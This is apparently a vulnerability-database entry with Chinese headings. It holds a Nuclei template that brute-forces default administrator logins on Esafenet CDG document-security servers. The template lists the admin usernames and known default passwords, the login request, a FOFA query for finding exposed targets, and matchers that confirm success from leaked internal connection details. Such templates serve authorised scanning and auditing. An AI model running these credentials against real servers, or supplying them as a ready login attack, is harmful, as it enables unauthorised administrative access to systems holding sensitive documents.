漏洞描述
Esafenet electronic document security management system default credentials were discovered.
esafenet-cdg-default-login: Esafenet CDG - Default Login
PoC代码[已公开]
id: esafenet-cdg-default-login
info:
name: Esafenet CDG - Default Login
author: chesterblue
severity: high
description: |
Esafenet electronic document security management system default credentials were discovered.
classification:
cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 32
vendor: esafenet
product: cdg
fofa-query: esafenet
tags: esafenet,cdg,default-login,vuln
http:
- method: POST
path:
- "{{BaseURL}}/CDGServer3/SystemConfig"
headers:
content-type: application/x-www-form-urlencoded
body: "command=Login&help=null&verifyCodeDigit=dfd&name={{username}}&pass={{password}}"
attack: clusterbomb
payloads:
username:
- "systemadmin"
- "configadmin"
- "secadmin"
- "docadmin"
password:
- "Est@Spc820"
- "12345678"
- "123456"
- "Est@Spc2018"
- "Est@Spc2019"
- "Est@Spc2020"
- "Est@Spc2021"
- "Est@Spc2022"
matchers-condition: and
matchers:
- type: word
words:
- "est.connection.url"
- type: regex
part: body
regex:
- "(127\\.0\\.0\\.1)|(localhost)(192\\.168|10\\.|172\\.(1[6-9]|2\\d|3[01]))\\.\\d{1,3}\\.\\d{1,3}"
- type: status
status:
- 200
# digest: 4a0a0047304502205cc568774c93f4856179949f33426381356d2740cfe6381a66a8e5fa2ffb622a022100af2b687281f958861aab3089f4099816a06184c2f36c6dc5a8e42c63da906250:922c64590222798bb761d5b6d8e72950